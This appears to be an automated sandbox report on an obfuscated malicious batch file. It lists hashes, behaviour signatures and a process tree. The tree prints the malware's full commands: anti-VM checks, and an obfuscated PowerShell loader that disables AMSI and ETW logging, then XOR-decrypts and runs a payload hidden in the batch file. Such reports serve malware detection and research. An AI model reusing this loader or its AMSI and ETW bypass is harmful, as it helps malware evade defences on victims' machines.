fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-12-2024 23:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

R8GHS_Client-built.exe_obf.bat
Size

4.8MB
MD5

0ea9a510475daf6eb6499a876dade6c2
SHA1

6b2414fc97ff2aa43a561d3110ec3e5017ca87ec
SHA256

fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db
SHA512

b94b96765df14ee5ca7617f98b2e5750ad361193f435c7d9e0a6c9f7a775cfd70c7960c522a055d69125652ce070c2281e29ccd120b00d5748c5aa4587ea494a
SSDEEP

49152:6xA1np9ExTwHISa8/DNhtJJMJYz4xkFjyfgxLHRvs24CJMBDU78RH:k

Score

6^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
3024	powershell.exe
2724	powershell.exe
2844	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
3048	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2112	powershell.exe
2724	powershell.exe
2844	powershell.exe
3024	powershell.exe
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeIncreaseQuotaPrivilege	2372	WMIC.exe
Token: SeSecurityPrivilege	2372	WMIC.exe
Token: SeTakeOwnershipPrivilege	2372	WMIC.exe
Token: SeLoadDriverPrivilege	2372	WMIC.exe
Token: SeSystemProfilePrivilege	2372	WMIC.exe
Token: SeSystemtimePrivilege	2372	WMIC.exe
Token: SeProfSingleProcessPrivilege	2372	WMIC.exe
Token: SeIncBasePriorityPrivilege	2372	WMIC.exe
Token: SeCreatePagefilePrivilege	2372	WMIC.exe
Token: SeBackupPrivilege	2372	WMIC.exe
Token: SeRestorePrivilege	2372	WMIC.exe
Token: SeShutdownPrivilege	2372	WMIC.exe
Token: SeDebugPrivilege	2372	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2372	WMIC.exe
Token: SeRemoteShutdownPrivilege	2372	WMIC.exe
Token: SeUndockPrivilege	2372	WMIC.exe
Token: SeManageVolumePrivilege	2372	WMIC.exe
Token: 33	2372	WMIC.exe
Token: 34	2372	WMIC.exe
Token: 35	2372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2372	WMIC.exe
Token: SeSecurityPrivilege	2372	WMIC.exe
Token: SeTakeOwnershipPrivilege	2372	WMIC.exe
Token: SeLoadDriverPrivilege	2372	WMIC.exe
Token: SeSystemProfilePrivilege	2372	WMIC.exe
Token: SeSystemtimePrivilege	2372	WMIC.exe
Token: SeProfSingleProcessPrivilege	2372	WMIC.exe
Token: SeIncBasePriorityPrivilege	2372	WMIC.exe
Token: SeCreatePagefilePrivilege	2372	WMIC.exe
Token: SeBackupPrivilege	2372	WMIC.exe
Token: SeRestorePrivilege	2372	WMIC.exe
Token: SeShutdownPrivilege	2372	WMIC.exe
Token: SeDebugPrivilege	2372	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2372	WMIC.exe
Token: SeRemoteShutdownPrivilege	2372	WMIC.exe
Token: SeUndockPrivilege	2372	WMIC.exe
Token: SeManageVolumePrivilege	2372	WMIC.exe
Token: 33	2372	WMIC.exe
Token: 34	2372	WMIC.exe
Token: 35	2372	WMIC.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	WMIC.exe
Token: SeSecurityPrivilege	2432	WMIC.exe
Token: SeTakeOwnershipPrivilege	2432	WMIC.exe
Token: SeLoadDriverPrivilege	2432	WMIC.exe
Token: SeSystemProfilePrivilege	2432	WMIC.exe
Token: SeSystemtimePrivilege	2432	WMIC.exe
Token: SeProfSingleProcessPrivilege	2432	WMIC.exe
Token: SeIncBasePriorityPrivilege	2432	WMIC.exe
Token: SeCreatePagefilePrivilege	2432	WMIC.exe
Token: SeBackupPrivilege	2432	WMIC.exe
Token: SeRestorePrivilege	2432	WMIC.exe
Token: SeShutdownPrivilege	2432	WMIC.exe
Token: SeDebugPrivilege	2432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2432	WMIC.exe
Token: SeRemoteShutdownPrivilege	2432	WMIC.exe
Token: SeUndockPrivilege	2432	WMIC.exe
Token: SeManageVolumePrivilege	2432	WMIC.exe
Token: 33	2432	WMIC.exe
Token: 34	2432	WMIC.exe
Token: 35	2432	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2432	WMIC.exe
Token: SeSecurityPrivilege	2432	WMIC.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.exenet.exe

description	pid	Process	procid_target
PID 3008 wrote to memory of 2112	3008	cmd.exe	31
PID 3008 wrote to memory of 2112	3008	cmd.exe	31
PID 3008 wrote to memory of 2112	3008	cmd.exe	31
PID 2112 wrote to memory of 2372	2112	powershell.exe	32
PID 2112 wrote to memory of 2372	2112	powershell.exe	32
PID 2112 wrote to memory of 2372	2112	powershell.exe	32
PID 3008 wrote to memory of 2724	3008	cmd.exe	34
PID 3008 wrote to memory of 2724	3008	cmd.exe	34
PID 3008 wrote to memory of 2724	3008	cmd.exe	34
PID 3008 wrote to memory of 584	3008	cmd.exe	35
PID 3008 wrote to memory of 584	3008	cmd.exe	35
PID 3008 wrote to memory of 584	3008	cmd.exe	35
PID 584 wrote to memory of 2432	584	cmd.exe	36
PID 584 wrote to memory of 2432	584	cmd.exe	36
PID 584 wrote to memory of 2432	584	cmd.exe	36
PID 3008 wrote to memory of 2828	3008	cmd.exe	37
PID 3008 wrote to memory of 2828	3008	cmd.exe	37
PID 3008 wrote to memory of 2828	3008	cmd.exe	37
PID 2828 wrote to memory of 2848	2828	cmd.exe	38
PID 2828 wrote to memory of 2848	2828	cmd.exe	38
PID 2828 wrote to memory of 2848	2828	cmd.exe	38
PID 3008 wrote to memory of 2844	3008	cmd.exe	39
PID 3008 wrote to memory of 2844	3008	cmd.exe	39
PID 3008 wrote to memory of 2844	3008	cmd.exe	39
PID 3008 wrote to memory of 2652	3008	cmd.exe	40
PID 3008 wrote to memory of 2652	3008	cmd.exe	40
PID 3008 wrote to memory of 2652	3008	cmd.exe	40
PID 2652 wrote to memory of 2600	2652	cmd.exe	42
PID 2652 wrote to memory of 2600	2652	cmd.exe	42
PID 2652 wrote to memory of 2600	2652	cmd.exe	42
PID 3008 wrote to memory of 940	3008	cmd.exe	43
PID 3008 wrote to memory of 940	3008	cmd.exe	43
PID 3008 wrote to memory of 940	3008	cmd.exe	43
PID 3008 wrote to memory of 3048	3008	cmd.exe	44
PID 3008 wrote to memory of 3048	3008	cmd.exe	44
PID 3008 wrote to memory of 3048	3008	cmd.exe	44
PID 3008 wrote to memory of 3052	3008	cmd.exe	45
PID 3008 wrote to memory of 3052	3008	cmd.exe	45
PID 3008 wrote to memory of 3052	3008	cmd.exe	45
PID 3008 wrote to memory of 636	3008	cmd.exe	46
PID 3008 wrote to memory of 636	3008	cmd.exe	46
PID 3008 wrote to memory of 636	3008	cmd.exe	46
PID 636 wrote to memory of 1112	636	net.exe	47
PID 636 wrote to memory of 1112	636	net.exe	47
PID 636 wrote to memory of 1112	636	net.exe	47
PID 3008 wrote to memory of 3024	3008	cmd.exe	48
PID 3008 wrote to memory of 3024	3008	cmd.exe	48
PID 3008 wrote to memory of 3024	3008	cmd.exe	48
PID 3008 wrote to memory of 2584	3008	cmd.exe	49
PID 3008 wrote to memory of 2584	3008	cmd.exe	49
PID 3008 wrote to memory of 2584	3008	cmd.exe	49
PID 3008 wrote to memory of 1608	3008	cmd.exe	50
PID 3008 wrote to memory of 1608	3008	cmd.exe	50
PID 3008 wrote to memory of 1608	3008	cmd.exe	50
PID 3008 wrote to memory of 1964	3008	cmd.exe	51
PID 3008 wrote to memory of 1964	3008	cmd.exe	51
PID 3008 wrote to memory of 1964	3008	cmd.exe	51
PID 3008 wrote to memory of 3012	3008	cmd.exe	52
PID 3008 wrote to memory of 3012	3008	cmd.exe	52
PID 3008 wrote to memory of 3012	3008	cmd.exe	52

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:2600
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:940
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:3048
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:3052
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat';$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, 0x61, 116, 105, 111, 0x6e, 0x2e, 0x41, 109, 0x73, 0x69, 85, 116, 105, 0x6c, 115)));$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73, 0x69, 0x49, 0x6e, 0x69, 0x74, 0x46, 0x61, 0x69, 0x6c, 0x65, 0x64)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));[ReFLeCtION.asSEmBlY]::LoAdWitHpArTIAlName(([SYsTEm.TEXT.eNcoDINg]::UTf8.geTstRINg((83, 121, 115, 116, 101, 109, 46, 67, 111, 114, 101)))).GetTYPE(([systEm.TeXT.EnCoDINg]::UtF8.GEtstRINg((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 69, 118)) + [SySTEm.tEXT.encodiNG]::UTF8.GETsTrIng((101, 110, 0x74, 0x69, 110, 0x67, 46, 69, 0x76, 101, 0x6e, 0x74, 0x50, 0x72, 111, 0x76, 105, 0x64, 0x65, 114)))).getfIeLd(([SYsTEm.text.eNCOdiNG]::uTF8.getstrINg((0x6d, 0x5f, 0x65, 0x6e)) + [sySTeM.Text.EncODiNg]::UtF8.GEtSTrInG((97, 98, 108)) + [syStem.TeXt.EncOdIng]::uTF8.GeTsTRing((0x65, 0x64))),([sySTem.Text.eNcodINg]::UtF8.GeTstRing([SYstEM.CoNveRT]::FROmBasE64STriNG('Tm9uUHVibGljLEluc3RhbmNl')))).seTValUE([REF].asseMBLy.GetTyPe(([sYStem.text.encOdINg]::UTf8.geTSTRiNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99)) + [SySTeM.texT.eNCoDING]::utF8.GeTStRINg((0x69, 110, 0x67, 46, 0x50, 83, 69, 0x74, 119, 76, 111, 103, 80, 0x72, 0x6f, 118, 0x69, 0x64, 0x65, 0x72)))).GEtfIeLD(([SYStEM.tExT.EncOdING]::uTf8.geTStRiNg((101, 0x74, 0x77, 80, 0x72, 111, 0x76, 105, 0x64, 0x65, 0x72))),([SystEm.teXT.EncOdinG]::Utf8.geTsTrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))).getVAluE($null),0);${k`DOttBa`IdXwfe`P}=[CONVert]::fRombaSe64StrING((.([char]((-10822 - 444 + 4792 + 6545))+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078))+[char]((13362 - 9970 + 1391 - 4738))+[char]((5188 - 4472 - 5840 + 5191))+[char]((-90 - 4243 - 5330 + 9774))+[char]((3240 - 773 + 150 - 2507))+[char]((2248 - 3603 - 6172 + 7643))+[char](((-1592 -Band 2269) + (-1592 -Bor 2269) + 1951 - 2527))+[char]((6728 - 396 - 8648 + 2426))+[char]((14221 - 2019 - 9923 - 2163))) $kDot_fIle -raw | .([char](((-10102 -Band 9771) + (-10102 -Bor 9771) + 8307 - 7893))+[char]((-5232 - 5714 + 5289 + 5758))+[char](((-21704 -Band 4830) + (-21704 -Bor 4830) + 7332 + 9650))+[char](((-5361 -Band 200) + (-5361 -Bor 200) - 1929 + 7191))+[char]((5796 - 1685 - 2855 - 1157))+[char]((6886 - 3432 - 3062 - 276))+[char]((-8782 - 6695 + 9561 + 5961))+[char]((10338 - 5304 - 9362 + 4411))+[char](((2817 -Band 574) + (2817 -Bor 574) + 6664 - 9939))+[char]((-935 - 4669 + 4701 + 1017))+[char]((14905 - 2821 - 7680 - 4299))+[char](((-20980 -Band 8328) + (-20980 -Bor 8328) + 9978 + 2784))+[char]((1948 - 3900 - 5056 + 7111))) (([sysTEM.TEXt.ENcODING]::uTF8.GeTsTrINg([sySTeM.CONveRT]::fRoMbaSe64STrING('Og=='))) + ([sySTEM.Text.EncODInG]::UtF8.getsTRing([SYSTem.CoNVerT]::fRombAse64sTRINg('OktET1Q6OiguKik='))))).MAtchEs.grOUps[1].VAlUE);${KDotDGukzlrZeN}=[sYstEM.tEXt.EnCoDiNg]::Utf8.geTBYtEs(([sYsteM.tEXT.EncOdIng]::UTf8.GeTSTRInG((109, 81, 98, 117, 108, 70, 114, 49, 114, 98, 52, 120, 86, 117, 52, 49))));${kdotcabiZvWzUe}=.([char](((489 -Band 330) + (489 -Bor 330) + 1171 - 1912))+[char](((5256 -Band 2125) + (5256 -Bor 2125) - 4663 - 2617))+[char]((436 - 1047 + 5610 - 4880))+[char](((6007 -Band 1143) + (6007 -Bor 1143) - 3369 - 3736))+[char](((6570 -Band 5861) + (6570 -Bor 5861) - 8832 - 3520))+[char](((-5856 -Band 5287) + (-5856 -Bor 5287) - 5737 + 6404))+[char]((190 - 4849 - 2788 + 7553))+[char]((15595 - 5946 - 3629 - 5919))+[char]((-4101 - 7031 + 6016 + 5215))+[char](((-7556 -Band 3381) + (-7556 -Bor 3381) + 9926 - 5635))) byte[] ${`Kd`Ottb`AIdX`WfeP}.lenGtH;for (${kdOtdGvp`BeC`Mnr}=0; ${kdOt`DGV`Pbe`Cmnr} -lt ${`KDottbAi`DXWfe`P}.lengTH; ${K`DotdG`VpbeCmnr}++) {${kDot`Ca`B`IZvWzue}[${`K`Dot`D`G`VPBeCmnr}]=${kdOttbaidxwfeP}[${kd`OtD`Gvpbe`Cmnr}] -bxor ${kdotDguKzLrZen}[${kd`OtdG`VpbeC`Mnr} % ${Kdotd`GuKzLr`Zen}.leNGTh]};.([char]((22989 - 8254 - 7750 - 6880))+[char](((-3745 -Band 1431) + (-3745 -Bor 1431) - 4880 + 7295))+[char]((14060 - 4791 - 239 - 8910))) ([sySTeM.TEXt.encodIng]::uTf8.geTSTRing(${kdotcabIzvWZue}))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2584
- C:\Windows\system32\doskey.exe
  doskey BCDEDIT=CERTUTIL
  2⤵
  PID:1608
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:1964
- C:\Windows\system32\doskey.exe
  doskey MD=CERTUTIL
  2⤵
  PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
875cee5ce5e876d1aa46a2769fad9549

SHA1
93a7432a7bb7c391ab0449a8d46ce05743fe4333

SHA256
0f697e24a3f54fdebc6462455811bffb0afe90239c3d41ec86d3279d4fb8a91b

SHA512
d7160614cf571c6d2da1554d6bcb81229b8fb14f8009915c390be82ca7c91a65535c3ed2c5c989364522d17ca251fcdca290eafb1df9039ec8caf91b4ccc0ebe

Download Submit
memory/2112-4-0x000007FEF58BE000-0x000007FEF58BF000-memory.dmp

Filesize
4KB

Download
memory/2112-5-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2112-7-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2112-9-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-8-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-10-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-11-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-12-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-18-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2724-19-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download